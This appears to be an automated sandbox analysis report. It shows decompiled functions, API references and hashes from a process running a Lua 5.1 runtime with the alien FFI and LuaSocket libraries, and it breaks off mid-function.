0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_tonumber.LUA5.1 ref: 00A2225E
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?), ref: 00A2258A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?), ref: 00A225B3
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00A225E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 00A22619
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22666
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22696
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226BF
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226E8
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22713
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2271E
lua_pushlightuserdata.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22749
luaL_error.LUA5.1(?,alien: unknown return type (function %s),?), ref: 00A22766
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_pushnil.$L_error.lua_pushlightuserdata.lua_pushstring.lua_tonumber.
String ID:
API String ID: 2475247279-0
Opcode ID: 03a1222080f20868749fbce3f9b8486a4c9e6cd4a55906e010838c2e955df561
Instruction ID: 1dbec59930727b59ad23788698885ceb182c81fc9f7135ec335a0f1c403b0b14
Opcode Fuzzy Hash: 03a1222080f20868749fbce3f9b8486a4c9e6cd4a55906e010838c2e955df561
Instruction Fuzzy Hash: 99B1A4B5D04129ABCB04EB98FE81DEEBBB8FF49300F144528F441B7246DA399A15CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004012F0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004012F0(intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				intOrPtr* _t3;
				char* _t4;
				void* _t7;
				void* _t9;
				intOrPtr* _t10;
				intOrPtr _t12;
				void* _t15;
				char* _t17;
				void* _t18;
				void* _t19;
				void* _t22;
				void* _t23;
				void* _t27;

				_t18 = __esi;
				_t3 = __edx;
				_t15 = __edx + 1;
				do {
					_t12 =  *_t3;
					_t3 = _t3 + 1;
				} while (_t12 != 0);
				_push(_a4);
				_t4 = _t3 - _t15;
				_push(_t4);
				_push(__edx);
				_push(__esi);
				L00401F1E();
				_t23 = _t22 + 0x10;
				if(_t4 != 0) {
					L5:
					_push(0xffffffff);
					_push(_t18);
					L00401F4E();
					if(_t4 != 0) {
						_push(0);
						_push(0xffffffff);
						_push(_t18);
						L00401F36();
						if(_t4 == 0) {
							_t4 = "(error object is not a string)";
						}
						E00401060(_t4);
						_push(0xfffffffe);
						_push(_t18);
						L00401F0C();
					}
					return 1;
				} else {
					L00401F00();
					_t17 = _t4;
					L00401F5A();
					L00401F06();
					_t10 = __imp__signal;
					_t7 =  *_t10(2, E00401030, __esi, _t17, __esi, E004010B0, 0, __esi, _t19, _t9); // executed
					L00401F60();
					_t4 =  *_t10(2, 0, __esi, 0, 0, _t17);
					_push(_t17);
					_push(__esi);
					L00401F7E();
					_t27 = _t23 + 0x40;
					if(_t7 == 0) {
						return 0;
					} else {
						_push(0);
						_push(2);
						_push(__esi);
						L00401ED6();
						_t23 = _t27 + 0xc;
						goto L5;
					}
				}
			}

0x004012f0
0x004012f0
0x004012f3
0x004012f6
0x004012f6
0x004012f8
0x004012fb
0x00401303
0x00401304
0x00401306
0x00401307
0x00401308
0x00401309
0x0040130e
0x00401313
0x00401372
0x00401372
0x00401374
0x0040137a
0x00401384
0x00401386
0x00401388
0x0040138a
0x0040138b
0x00401395
0x00401397
0x00401397
0x004013a2
0x004013a7
0x004013a9
0x004013aa
0x004013af
0x004013b5
0x00401315
0x00401318
0x00401325
0x00401327
0x0040132e
0x00401333
0x00401340
0x00401348
0x00401353
0x00401355
0x00401356
0x00401357
0x0040135c
0x00401363
0x004013b9
0x00401365
0x00401365
0x00401367
0x00401369
0x0040136a
0x0040136f
0x00000000
0x0040136f
0x00401363

APIs

luaL_loadbuffer.LUA5.1(?,?,?,?), ref: 00401309
lua_gettop.LUA5.1 ref: 00401318
lua_pushcclosure.LUA5.1(?,Function_000010B0,00000000), ref: 00401327
lua_insert.LUA5.1(?,00000000,?,Function_000010B0,00000000), ref: 0040132E
signal.MSVCR80 ref: 00401340
lua_pcall.LUA5.1(?,00000000,00000000,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401348
signal.MSVCR80 ref: 00401353
lua_remove.LUA5.1(?,00000000,?,00000000,00000000,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401357
lua_gc.LUA5.1(?,00000002,00000000), ref: 0040136A
lua_type.LUA5.1(?,000000FF), ref: 0040137A
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 0040138B
lua_settop.LUA5.1(?,000000FE,00000000), ref: 004013AA

Strings

(error object is not a string), xrefs: 00401397, 0040139C

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: signal$L_loadbuffer.lua_gc.lua_gettop.lua_insert.lua_pcall.lua_pushcclosure.lua_remove.lua_settop.lua_tolstring.lua_type.
String ID: (error object is not a string)
API String ID: 3939660861-1990977736
Opcode ID: 54b58262517779eaa96b8bba3cc013da6f175bc61c070a80f39300eb8bc17fcb
Instruction ID: 5bf7bef86c5210915bf19a903821d4090590f29a4a6f837a2ce0cb58567de200
Opcode Fuzzy Hash: 54b58262517779eaa96b8bba3cc013da6f175bc61c070a80f39300eb8bc17fcb
Instruction Fuzzy Hash: CD11947274521136E62136665C07F6B224C8F82754F24027AFE14B62E6EA7DA90141AE

Uniqueness

Uniqueness Score: -1.00%

Function 100100F0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E100100F0(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _t19;
				char* _t20;
				void* _t21;
				void* _t26;
				intOrPtr _t27;
				void* _t29;
				void* _t30;
				void* _t32;
				void* _t34;

				_t34 = __eflags;
				_t21 = __ecx;
				_t27 = _a4;
				_t19 = E10001150(_t27);
				_a4 = _t19;
				E10001B90(_t21, _t34, _t27, 0xffffd8ee, "tostring");
				_t26 = 1;
				_t30 = _t29 + 0x10;
				_t35 = _t19 - 1;
				if(_t19 < 1) {
					L5:
					fputs("\n", __imp___iob + 0x20);
					return 0;
				} else {
					while(1) {
						E100013D0(_t35, _t27, 0xffffffff);
						E100013D0(_t35, _t27, _t26);
						E10002070(_t27, 1, 1);
						_t20 = E100016F0(_t35, _t27, 0xffffffff, 0);
						_t32 = _t30 + 0x28;
						if(_t20 == 0) {
							break;
						}
						if(_t26 > 1) {
							fputs("\t", __imp___iob + 0x20);
							_t32 = _t32 + 8;
						}
						fputs(_t20, __imp___iob + 0x20); // executed
						E10001160(_t27, 0xfffffffe);
						_t30 = _t32 + 0x10;
						_t26 = _t26 + 1;
						if(_t26 <= _a4) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					_push("\'tostring\' must return a string to \'print\'");
					_push(_t27);
					return E1000F230();
				}
				L7:
			}

0x100100f0
0x100100f0
0x100100f3
0x10010103
0x1001010b
0x1001010f
0x1001011a
0x1001011f
0x10010122
0x10010124
0x1001018b
0x1001019a
0x100101a5
0x10010126
0x10010126
0x10010129
0x10010130
0x1001013a
0x10010149
0x1001014b
0x10010150
0x00000000
0x00000000
0x10010155
0x10010165
0x10010167
0x10010167
0x10010175
0x1001017a
0x10010183
0x10010186
0x10010189
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10010189
0x100101a6
0x100101ab
0x100101b8
0x100101b8
0x00000000

APIs

lua_gettop.LUA5.1(?), ref: 100100F9
lua_getfield.LUA5.1(?,FFFFD8EE,tostring,?), ref: 1001010F

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_pushvalue.LUA5.1(?,000000FF), ref: 10010129
lua_pushvalue.LUA5.1(?,00000001,?,000000FF), ref: 10010130
lua_call.LUA5.1(?,00000001,00000001,?,00000001,?,000000FF), ref: 1001013A
lua_tolstring.LUA5.1(?,000000FF,00000000,?,00000001,00000001,?,00000001,?,000000FF), ref: 10010144
fputs.MSVCRT ref: 10010165
fputs.MSVCRT ref: 10010175
lua_settop.LUA5.1(?,000000FE), ref: 1001017A
fputs.MSVCRT ref: 1001019A
luaL_error.LUA5.1(?,'tostring' must return a string to 'print'), ref: 100101AC

Strings

tostring, xrefs: 100100FE
'tostring' must return a string to 'print', xrefs: 100101A6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: fputs$lua_pushvalue.$L_error.S_newlstr.lua_call.lua_getfield.lua_gettop.lua_settop.lua_tolstring.
String ID: 'tostring' must return a string to 'print'$tostring
API String ID: 3046415957-3217052939
Opcode ID: cec5833d79a9e178845e19b519ff49cddf9440460984a6db986b1948579debb7
Instruction ID: 16c06cb4f708b0670bf462c8e11ee8e788ecbbd34562d06277b657a50dbcfedb
Opcode Fuzzy Hash: cec5833d79a9e178845e19b519ff49cddf9440460984a6db986b1948579debb7
Instruction Fuzzy Hash: 0B110D3570122477F601D369ACC2FEF3299DFC92A5F140625F654662C2D6B6FA8102AD

Uniqueness

Uniqueness Score: -1.00%

Function 009915C0, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
networkCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E009915C0(long long __fp0, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v30;
				signed int _t10;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;

				_t20 =  &_v20;
				_push(_t20);
				_t10 =  *_a8;
				_push( &_v16);
				_push(_t10);
				_v20 = 0x10;
				L00994A28(); // executed
				if(_t10 >= 0) {
					_push(_v24);
					L00994A10();
					_t18 = _v12;
					_push(_t10);
					_push(_t18);
					L00994AD0();
					_push(_v30);
					L00994A1C();
					_v16 = _t10 & 0x0000ffff;
					asm("fild dword [esp+0x24]");
					 *((long long*)(_t20 + 8 - 8)) = __fp0;
					_push(_t18);
					L00994B5A();
					return 2;
				} else {
					_t19 = _v8;
					_push(_t19);
					L00994B4E();
					_push("getsockname failed");
					_push(_t19);
					L00994AD0();
					return 2;
				}
			}

0x009915c0
0x009915cc
0x009915cd
0x009915d3
0x009915d4
0x009915d5
0x009915dd
0x009915e4
0x0099160c
0x0099160d
0x00991612
0x00991616
0x00991617
0x00991618
0x00991624
0x00991625
0x00991632
0x00991636
0x0099163a
0x0099163d
0x0099163e
0x0099164f
0x009915e6
0x009915e6
0x009915ea
0x009915eb
0x009915f0
0x009915f5
0x009915f6
0x00991607
0x00991607

APIs

getsockname.WSOCK32 ref: 009915DD
lua_pushnil.LUA5.1(?), ref: 009915EB
lua_pushstring.LUA5.1(?,getsockname failed,?), ref: 009915F6
inet_ntoa.WSOCK32(?), ref: 0099160D
lua_pushstring.LUA5.1(?,00000000,?), ref: 00991618
htons.WSOCK32(?), ref: 00991625
lua_pushnumber.LUA5.1(?), ref: 0099163E

Strings

getsockname failed, xrefs: 009915F0

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$getsocknamehtonsinet_ntoalua_pushnil.lua_pushnumber.
String ID: getsockname failed
API String ID: 1595534711-589798893
Opcode ID: 388bd1e829d9daa89230b10a382eb640632bf48ad3dcd95e0e28491a2d7588ea
Instruction ID: 2e859480c6271dcc025e22baff6492f99b2d0352a067ad968edf8b83a2ce72db
Opcode Fuzzy Hash: 388bd1e829d9daa89230b10a382eb640632bf48ad3dcd95e0e28491a2d7588ea
Instruction Fuzzy Hash: DA0184B18092116BCA01FB1CDC42F5F7798AFC4318F444968F48457201E634D91A87AB

Uniqueness

Uniqueness Score: -1.00%

Function 00992C40, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00992C40(intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v16;
				intOrPtr _t9;
				intOrPtr _t18;

				_push(_a24);
				_t9 = _a12;
				_push(_a20);
				_push(_a16);
				_push(_t9);
				_push( *_a8); // executed
				L00994A3A(); // executed
				if(_t9 >= 0) {
					_push(0x3ff00000);
					_push(0);
					_push(_v16);
					L00994B5A();
					return 1;
				} else {
					_t18 = _v16;
					_push(_t18);
					L00994B4E();
					_push("setsockopt failed");
					_push(_t18);
					L00994AD0();
					return 2;
				}
			}

0x00992c4c
0x00992c4d
0x00992c51
0x00992c56
0x00992c57
0x00992c5a
0x00992c5b
0x00992c62
0x00992c88
0x00992c8d
0x00992c8f
0x00992c90
0x00992c9d
0x00992c64
0x00992c65
0x00992c69
0x00992c6a
0x00992c6f
0x00992c74
0x00992c75
0x00992c83
0x00992c83

APIs

#21.WSOCK32(?,?,?,?,?,00992CCD,?,?,?,?,?,00000004,?,00000003,?,009928D6), ref: 00992C5B
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,00992CCD,?,?,?,?,?,00000004,?,00000003), ref: 00992C6A
lua_pushstring.LUA5.1(?,setsockopt failed,?,?,?,?,?,?,?,00992CCD,?,?,?,?,?,00000004), ref: 00992C75
lua_pushnumber.LUA5.1(?,00000000,3FF00000,?,?,?,?,?,00992CCD,?,?,?,?,?,00000004,?), ref: 00992C90

Strings

setsockopt failed, xrefs: 00992C6F

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnil.lua_pushnumber.lua_pushstring.
String ID: setsockopt failed
API String ID: 2312535656-3136062831
Opcode ID: 6591e929621229fec13998810f62f2ab41bb93f9258e86dd844dafe7a35d8e58
Instruction ID: 3d80baccb3b5b93e76deea776b117d454489c54701e834273a286ac22a39c0b8
Opcode Fuzzy Hash: 6591e929621229fec13998810f62f2ab41bb93f9258e86dd844dafe7a35d8e58
Instruction Fuzzy Hash: 73F01CB56093117BDB01EA5CEC41F6F73E9AFD8704F04495CF54493241D624EC068BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00993FE0, Relevance: 7.6, APIs: 5, Instructions: 112
networkCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00993FE0(intOrPtr* _a4, signed char _a8, signed int _a12) {
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v256;
				char _v260;
				intOrPtr _v516;
				char _v520;
				intOrPtr _v776;
				char _v780;
				signed int _v784;
				signed int _v788;
				char _v800;
				signed int _t30;
				intOrPtr* _t31;
				signed int _t33;
				intOrPtr _t35;
				signed int* _t40;
				signed char _t48;
				char* _t52;
				char* _t60;
				char* _t67;
				signed int _t79;

				_t30 = _a12;
				asm("fcomp qword [0x995168]");
				_t67 = 0;
				_t52 = 0;
				asm("fnstsw ax");
				_t60 = 0;
				_t40 = 0;
				if((_t30 & 0x00000040) == 0) {
					_t48 = _a8;
					_t31 = _a4;
					if((0x00000001 & _t48) != 0) {
						_v520 = 1;
						_v516 =  *_t31;
						_t67 =  &_v520;
					}
					if((_t48 & 0x00000002) != 0) {
						_v260 = 1;
						_v256 =  *_t31;
						_t52 =  &_v260;
					}
					if((_t48 & 0x00000006) != 0) {
						_v780 = 1;
						_v776 =  *_t31;
						_t60 =  &_v780;
					}
					_t33 = E00992D00(_a12, _a12);
					_t79 = st0;
					asm("fcomp qword [0x995168]");
					asm("fnstsw ax");
					if((_t33 & 0x00000001) != 0) {
						st0 = _t79;
					} else {
						L00994BD0();
						_v788 = _t33;
						asm("fild dword [esp+0x10]");
						asm("fsubr st0, st1");
						L00994BD0();
						st0 = st0 *  *0x9951d8;
						_v784 = _t33;
						_t40 =  &_v788;
					}
					_push(_t40);
					_push(_t60);
					_push(_t52);
					_push(_t67);
					_push(0); // executed
					L00994A58(); // executed
					if(_t33 != 0xffffffff) {
						if(_t33 != 0) {
							if(_v12 != 6) {
								L18:
								return 0;
							} else {
								_push( &_v800);
								_t35 =  *_v16;
								_push(_t35);
								L00994A40();
								if(_t35 == 0) {
									goto L18;
								} else {
									return 0xfffffffe;
								}
							}
						} else {
							return _t33 | 0xffffffff;
						}
					} else {
						L00994A52();
						return _t33;
					}
				} else {
					return _t30 | 0xffffffff;
				}
			}

0x00993fe0
0x00993fec
0x00993ff6
0x00993ff8
0x00993ffa
0x00993ffc
0x00993ffe
0x00994003
0x00994013
0x0099401a
0x00994028
0x0099402c
0x00994033
0x0099403a
0x0099403a
0x00994044
0x00994048
0x0099404f
0x00994056
0x00994056
0x00994060
0x00994064
0x00994068
0x0099406c
0x0099406c
0x00994078
0x0099407d
0x0099407f
0x00994088
0x0099408d
0x009940b7
0x0099408f
0x00994091
0x00994096
0x0099409a
0x0099409e
0x009940a6
0x009940ab
0x009940ad
0x009940b1
0x009940b1
0x009940b9
0x009940ba
0x009940bb
0x009940bc
0x009940bd
0x009940bf
0x009940c7
0x009940db
0x009940f3
0x0099411d
0x00994129
0x009940f5
0x00994100
0x00994101
0x00994103
0x00994104
0x0099410b
0x00000000
0x0099410d
0x0099411c
0x0099411c
0x0099410b
0x009940dd
0x009940ea
0x009940ea
0x009940c9
0x009940c9
0x009940d8
0x009940d8
0x00994005
0x00994012
0x00994012

APIs

_ftol.MSVCRT ref: 00994091
_ftol.MSVCRT ref: 009940A6
select.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 009940BF
WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 009940C9

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: _ftol$ErrorLastselect
String ID:
API String ID: 1742309442-0
Opcode ID: 70f274832adc62fab07d40fd7b53ce4c51d985e294f579f6f3e8d8c7324d1481
Instruction ID: 4f2801c7205b60cb9b0ffa3b6e3f202b5e074e6ef74401059f6afa9200114935
Opcode Fuzzy Hash: 70f274832adc62fab07d40fd7b53ce4c51d985e294f579f6f3e8d8c7324d1481
Instruction Fuzzy Hash: EA310B716083055BDB329F6CE841BDBB7D8EFC9370F10092EEA6487290E735554A8B96

Uniqueness

Uniqueness Score: -1.00%

Function 10012800, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10012800(void* __edi, void* __esi, void* __ebp, void* __eflags, intOrPtr _a4, struct _IO_FILE* _a8, int _a12) {
				char _v524;
				void* __ebx;
				void* _t11;
				int _t12;
				struct _IO_FILE* _t19;
				void* _t20;
				int _t27;
				int _t30;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t40;

				_t40 = __eflags;
				_t35 =  &_v524;
				E1000FC00(_a4, _t35);
				_t19 = _a8;
				_t27 = _a12;
				_t36 = _t35 + 8;
				_t30 = 0x200;
				do {
					_t11 = E1000F9E0(_t40,  &_v524);
					_t37 = _t36 + 4;
					if(_t30 > _t27) {
						_t30 = _t27;
					}
					_t12 = fread(_t11, 1, _t30, _t19); // executed
					_t36 = _t37 + 0x10;
					_t27 = _t27 - _t12;
					_v524 = _v524 + _t12;
				} while (_t27 != 0 && _t12 == _t30);
				E1000FB40( &_v524);
				_t44 = _t27;
				_pop(_t20);
